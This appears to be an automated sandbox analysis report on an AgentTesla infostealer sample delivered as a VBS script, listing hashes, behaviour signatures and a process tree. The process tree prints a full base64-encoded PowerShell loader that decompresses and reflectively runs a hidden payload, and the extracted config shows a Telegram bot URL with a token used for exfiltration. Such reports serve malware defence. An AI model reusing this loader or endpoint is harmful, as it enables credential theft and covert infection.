Analysis
-
max time kernel
56s -
max time network
55s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system -
submitted
30-04-2024 01:22
Static task
static1
Behavioral task
behavioral1
Sample
28a11a70ff2b31bebb28fa2193a39ade7ce17f4478beb57f60405ea7452e988f.vbs
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
28a11a70ff2b31bebb28fa2193a39ade7ce17f4478beb57f60405ea7452e988f.vbs
Resource
win10v2004-20240419-en
General
-
Target
28a11a70ff2b31bebb28fa2193a39ade7ce17f4478beb57f60405ea7452e988f.vbs
-
Size
297KB
-
MD5
6f56f9adf7bc5d555743d7f9af963e1a
-
SHA1
fcff87c7393b15e4db5db7fe9c92ea22d878aebf
-
SHA256
28a11a70ff2b31bebb28fa2193a39ade7ce17f4478beb57f60405ea7452e988f
-
SHA512
8d5381f64c1f084131c90344c41a8abe6b9d5f6680b2edfe8c0611386566c59b42ab8337c7d729ba3637bb2262af2a9521fee9ea166a3d02aa32405db3dd6113
-
SSDEEP
6144:S1b5FHcTMW5dXdwYLJd+ePCCvlrnCgUhfVseeDoh1yYvczYz:S1tZBWB1aeR1CfieeDohQA
Malware Config
Extracted
agenttesla
https://api.telegram.org/bot6848173762:AAGkzL4gp0AnmZ6UfiPCUuUFvn7Vkjdjn1M/
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\koFiVp.vbs powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\koFiVp.vbs powershell.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 4 api.ipify.org -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 3924 set thread context of 3372 3924 powershell.exe RegAsm.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepid process 1220 powershell.exe 1220 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exeRegAsm.exedescription pid process Token: SeDebugPrivilege 1220 powershell.exe Token: SeDebugPrivilege 3924 powershell.exe Token: SeDebugPrivilege 3372 RegAsm.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
RegAsm.exepid process 3372 RegAsm.exe -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
WScript.execmd.exepowershell.exedescription pid process target process PID 3612 wrote to memory of 1468 3612 WScript.exe cmd.exe PID 3612 wrote to memory of 1468 3612 WScript.exe cmd.exe PID 1468 wrote to memory of 1220 1468 cmd.exe powershell.exe PID 1468 wrote to memory of 1220 1468 cmd.exe powershell.exe PID 1468 wrote to memory of 1220 1468 cmd.exe powershell.exe PID 1468 wrote to memory of 3924 1468 cmd.exe powershell.exe PID 1468 wrote to memory of 3924 1468 cmd.exe powershell.exe PID 1468 wrote to memory of 3924 1468 cmd.exe powershell.exe PID 3924 wrote to memory of 3372 3924 powershell.exe RegAsm.exe PID 3924 wrote to memory of 3372 3924 powershell.exe RegAsm.exe PID 3924 wrote to memory of 3372 3924 powershell.exe RegAsm.exe PID 3924 wrote to memory of 3372 3924 powershell.exe RegAsm.exe PID 3924 wrote to memory of 3372 3924 powershell.exe RegAsm.exe PID 3924 wrote to memory of 3372 3924 powershell.exe RegAsm.exe PID 3924 wrote to memory of 3372 3924 powershell.exe RegAsm.exe PID 3924 wrote to memory of 3372 3924 powershell.exe RegAsm.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28a11a70ff2b31bebb28fa2193a39ade7ce17f4478beb57f60405ea7452e988f.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\koFiVp.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('IyAiSGUgd2hvIGhhcyBhIHdoeSB0byBsaXZlIGNhbiBiZWFyIGFsbW9zdCBhbnkgaG93LiINCiMgIlRvIGxpdmUgaXMgdG8gc3VmZmVyLCB0byBzdXJ2aXZlIGlzIHRvIGZpbmQgc29tZSBtZWFuaW5nIGluIHRoZSBzdWZmZXJpbmcuIg0KIyAiV2l0aG91dCBtdXNpYywgbGlmZSB3b3VsZCBiZSBhIG1pc3Rha2UuIg0KDQpmdW5jdGlvbiBEZWNvbXByZXNzQnl0ZXMoJGNvbXByZXNzZWREYXRhKSB7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGNvbXByZXNzZWREYXRhKSkpOyAkbXMuUG9zaXRpb24gPSAwOyAkZGVmbGF0ZVN0cmVhbSA9IFtJTy5Db21wcmVzc2lvbi5EZWZsYXRlU3RyZWFtXTo6bmV3KCRtcywgW0lPLkNvbXByZXNzaW9uLkNvbXByZXNzaW9uTW9kZV06OkRlY29tcHJlc3MpOyAkYnVmZmVyID0gW2J5dGVbXV06Om5ldyg0MDk2KTsgJG1zID0gW0lPLk1lbW9yeVN0cmVhbV06Om5ldygpOyB3aGlsZSAoJHRydWUpIHsgJGNvdW50ID0gJGRlZmxhdGVTdHJlYW0uUmVhZCgkYnVmZmVyLCAwLCAkYnVmZmVyLkxlbmd0aCk7IGlmICgkY291bnQgLWVxIDApIHsgYnJlYWsgfSAkbXMuV3JpdGUoJGJ1ZmZlciwgMCwgJGNvdW50KSB9ICRkZWZsYXRlU3RyZWFtLkNsb3NlKCk7ICRtcy5Ub0FycmF5KCkgfQ0KDQojICJUaGUgc3VyZXN0IHdheSB0byBjb3JydXB0IGEgeW91dGggaXMgdG8gaW5zdHJ1Y3QgaGltIHRvIGhvbGQgaW4gaGlnaGVyIGVzdGVlbSB0aG9zZSB3aG8gdGhpbmsgYWxpa2UgdGhhbiB0aG9zZSB3aG8gdGhpbmsgZGlmZmVyZW50bHkuIg0KIyAiSW4gaGVhdmVuLCBhbGwgdGhlIGludGVyZXN0aW5nIHBlb3BsZSBhcmUgbWlzc2luZy4iDQoNCg0KDQpmdW5jdGlvbiBSZXZlcnNlU3RyaW5nKCRpbnB1dFN0cmluZykgew0KICAgICRjaGFyQXJyYXkgPSAkaW5wdXRTdHJpbmcuVG9DaGFyQXJyYXkoKQ0KICAgICRyZXZlcnNlZEFycmF5ID0gJGNoYXJBcnJheVstMS4uLSgkY2hhckFycmF5Lkxlbmd0aCldDQogICAgJHJldmVyc2VkU3RyaW5nID0gLWpvaW4gJHJldmVyc2VkQXJyYXkNCiAgICByZXR1cm4gJHJldmVyc2VkU3RyaW5nDQp9DQojICJUaGVyZSBpcyBhbHdheXMgc29tZSBtYWRuZXNzIGluIGxvdmUuIEJ1dCB0aGVyZSBpcyBhbHNvIGFsd2F5cyBzb21lIHJlYXNvbiBpbiBtYWRuZXNzLiINCiMgIlRoYXQgd2hpY2ggZG9lcyBub3Qga2lsbCB1cyBtYWtlcyB1cyBzdHJvbmdlci4iDQoNCmZ1bmN0aW9uIENsb3NlLVByb2Nlc3Mgew0KICAgIHBhcmFtKA0KICAgICAgICBbc3RyaW5nXSRQcm9jZXNzTmFtZQ0KICAgICkNCg0KICAgICRwcm9jZXNzID0gR2V0LVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1FcnJvckFjdGlvbiBTaWxlbnRseUNvbnRpbnVlDQoNCiAgICBpZiAoJHByb2Nlc3MgLW5lICRudWxsKSB7DQogICAgICAgIFN0b3AtUHJvY2VzcyAtTmFtZSAkUHJvY2Vzc05hbWUgLUZvcmNlDQoJfQ0KfQ0KIyAiSW4gaW5kaXZpZHVhbHMsIGluc2FuaXR5IGlzIHJhcmU7IGJ1dCBpbiBncm91cHMsIHBhcnRpZXMsIG5hdGlvbnMsIGFuZCBlcG9jaHMsIGl0IGlzIHRoZSBydWxlLiINCg0KZnVuY3Rpb24gQ05WKCRhcnIpeyANCiAgICAkbz0xMjM7IA0KICAgICRkPSRudWxsOyANCiAgICBmb3JlYWNoKCRpIGluICRhcnIpeyANCiAgICAgICAgaWYgKCRpIC1ndCAxMjcpIHsgDQogICAgICAgICAgICAkZCs9IFtjaGFyXSgkaS0kbykgDQogICAgICAgIH0gZWxzZSB7IA0KICAgICAgICAgICAgJGQrPSBbY2hhcl0oJGkrJG8pIA0KICAgICAgICB9IA0KICAgIH0gDQogICAgcmV0dXJuICRkIA0KfQ0KIyAiVGhlIG1hbiBvZiBrbm93bGVkZ2UgbXVzdCBiZSBhYmxlIG5vdCBvbmx5IHRvIGxvdmUgaGlzIGVuZW1pZXMgYnV0IGFsc28gdG8gaGF0ZSBoaXMgZnJpZW5kcy4iDQojICJBIHRoaW5rZXIgc2VlcyBoaXMgb3duIGFjdGlvbnMgYXMgZXhwZXJpbWVudHMgYW5kIHF1ZXN0aW9ucyDigJQgYXMgYXR0ZW1wdHMgdG8gZmluZCBvdXQgc29tZXRoaW5nLiBTdWNjZXNzIGFuZCBmYWlsdXJlIGFyZSBmb3IgaGltIGFuc3dlcnMgYWJvdmUgYWxsLiINCg0KDQokZW5jb2RlZEFycmF5ID0gQCgxNTksMjIwLDIzOCwyMzgsMjI0LDIzMiwyMjEsMjMxLDI0NCwxNjksMTkyLDIzMywyMzksMjM3LDI0NCwyMDMsMjM0LDIyOCwyMzMsMjM5LDE2OSwxOTYsMjMzLDI0MSwyMzQsMjMwLDIyNCwxNjMsMTU5LDIzMywyNDAsMjMxLDIzMSwxNjcsMTU5LDIzMywyNDAsMjMxLDIzMSwxNjQsMTgyKQ0KJGRlY29kZWRTdHJpbmcgPSBDTlYgJGVuY29kZWRBcnJheQ0KDQoNCiRmaWxlUGF0aCA9IEpvaW4tUGF0aCAkZW52OlVzZXJQcm9maWxlICJrb0ZpVnAuYmF0Ig0KJGxhc3RMaW5lID0gR2V0LUNvbnRlbnQgLVBhdGggJGZpbGVQYXRoIHwgU2VsZWN0LU9iamVjdCAtTGFzdCAxDQokY2xlYW5lZExpbmUgPSAkbGFzdExpbmUgLXJlcGxhY2UgJ146OicNCiRyZXZlcnNlID0gUmV2ZXJzZVN0cmluZyAkY2xlYW5lZExpbmUNCiRkZWNvbXByZXNzZWRCeXRlID0gRGVjb21wcmVzc0J5dGVzIC1jb21wcmVzc2VkRGF0YSAkcmV2ZXJzZQ0KIyAiVGhlIG1hbiBvZiBrbm93bGVkZ2UgbXVzdCBiZSBhYmxlIG5vdCBvbmx5IHRvIGxvdmUgaGlzIGVuZW1pZXMgYnV0IGFsc28gdG8gaGF0ZSBoaXMgZnJpZW5kcy4iDQojICJBIHRoaW5rZXIgc2VlcyBoaXMgb3duIGFjdGlvbnMgYXMgZXhwZXJpbWVudHMgYW5kIHF1ZXN0aW9ucyDigJQgYXMgYXR0ZW1wdHMgdG8gZmluZCBvdXQgc29tZXRoaW5nLiBTdWNjZXNzIGFuZCBmYWlsdXJlIGFyZSBmb3IgaGltIGFuc3dlcnMgYWJvdmUgYWxsLiINCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQokYXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJGRlY29tcHJlc3NlZEJ5dGUpDQoNCg0KQ2xvc2UtUHJvY2VzcyAtUHJvY2Vzc05hbWUgImNtZCINCkludm9rZS1FeHByZXNzaW9uICRkZWNvZGVkU3RyaW5n')) | Out-File -FilePath 'C:\Users\Admin\koFiVp.ps1' -Encoding UTF8"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\koFiVp.ps1"3⤵
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
1KB
MD54280e36a29fa31c01e4d8b2ba726a0d8
SHA1c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
16KB
MD57e6b75f6608d2e82f467f73e39143ee9
SHA19a2d7b03eea7cb8e8b2b07b851874a702cda5ce5
SHA2563012fb2403f3b6a7975054eef075d1e56dbd6fbb55820b2fe55698c8468e6bf6
SHA51223d8c6bccf32b6459f2ae8a65e139b567cb81433b21cc84154afe9426e5cf27b45b08c363e170c0f4d79a14c987ba36ae0e82d8248f35bfdf0c1bd49fdbea5f1
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n2olkdk5.zrz.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\koFiVp.batFilesize
277KB
MD50b559157fc24f3d30eb86f521b90ca05
SHA1b14552d2a9e30c65c4b2ab3975f2c28a70e7482c
SHA256848a86578531474c2ab7a0a24e893e4622e794e2f56041902f9d7a0f5b442e57
SHA5128e782ef7bd83a5693ca04b2905d71a2d9b30170cf47c92d10730d09e5127b0fe0c8128e0b3ccbbb1f55bbfb1fe3118d939e21748762f49f41587f6c2b4870d20
-
C:\Users\Admin\koFiVp.ps1Filesize
2KB
MD581a0dc1efcbb4347d8204ba454c530bd
SHA1d11b2417f0f008c036873c7a610adc2088c80f1d
SHA2569920dbc679fdd1c800a11a40d2b22ca65f1a4a96e4e173505c1c27f09c80e760
SHA5129116d86b1bf980da6f68e4ad07e8805030d0941d298dd58c80b16f5c9b8ffd48c9c72c75b8588180b85adc9766401531dc43cdc32da345712913c73d8563f0e0
-
C:\Users\Admin\koFiVp.vbsFilesize
297KB
MD56f56f9adf7bc5d555743d7f9af963e1a
SHA1fcff87c7393b15e4db5db7fe9c92ea22d878aebf
SHA25628a11a70ff2b31bebb28fa2193a39ade7ce17f4478beb57f60405ea7452e988f
SHA5128d5381f64c1f084131c90344c41a8abe6b9d5f6680b2edfe8c0611386566c59b42ab8337c7d729ba3637bb2262af2a9521fee9ea166a3d02aa32405db3dd6113
-
memory/1220-29-0x0000000075130000-0x00000000758E0000-memory.dmpFilesize
7.7MB
-
memory/1220-7-0x0000000004C90000-0x0000000004CA0000-memory.dmpFilesize
64KB
-
memory/1220-10-0x0000000005970000-0x00000000059D6000-memory.dmpFilesize
408KB
-
memory/1220-21-0x0000000005AC0000-0x0000000005E14000-memory.dmpFilesize
3.3MB
-
memory/1220-22-0x0000000005F60000-0x0000000005F7E000-memory.dmpFilesize
120KB
-
memory/1220-23-0x0000000005FB0000-0x0000000005FFC000-memory.dmpFilesize
304KB
-
memory/1220-24-0x00000000078B0000-0x0000000007F2A000-memory.dmpFilesize
6.5MB
-
memory/1220-25-0x00000000064A0000-0x00000000064BA000-memory.dmpFilesize
104KB
-
memory/1220-9-0x00000000051C0000-0x00000000051E2000-memory.dmpFilesize
136KB
-
memory/1220-8-0x00000000052D0000-0x00000000058F8000-memory.dmpFilesize
6.2MB
-
memory/1220-6-0x0000000075130000-0x00000000758E0000-memory.dmpFilesize
7.7MB
-
memory/1220-11-0x0000000005A50000-0x0000000005AB6000-memory.dmpFilesize
408KB
-
memory/1220-5-0x0000000004BA0000-0x0000000004BD6000-memory.dmpFilesize
216KB
-
memory/3372-49-0x0000000000400000-0x0000000000442000-memory.dmpFilesize
264KB
-
memory/3372-51-0x00000000065C0000-0x0000000006610000-memory.dmpFilesize
320KB
-
memory/3372-52-0x00000000066B0000-0x0000000006742000-memory.dmpFilesize
584KB
-
memory/3372-53-0x0000000006670000-0x000000000667A000-memory.dmpFilesize
40KB
-
memory/3924-43-0x00000000070B0000-0x00000000070D2000-memory.dmpFilesize
136KB
-
memory/3924-44-0x0000000007780000-0x0000000007D24000-memory.dmpFilesize
5.6MB
-
memory/3924-45-0x00000000072A0000-0x000000000731E000-memory.dmpFilesize
504KB
-
memory/3924-42-0x0000000007130000-0x00000000071C6000-memory.dmpFilesize
600KB
-
memory/3924-48-0x00000000026A0000-0x00000000026AA000-memory.dmpFilesize
40KB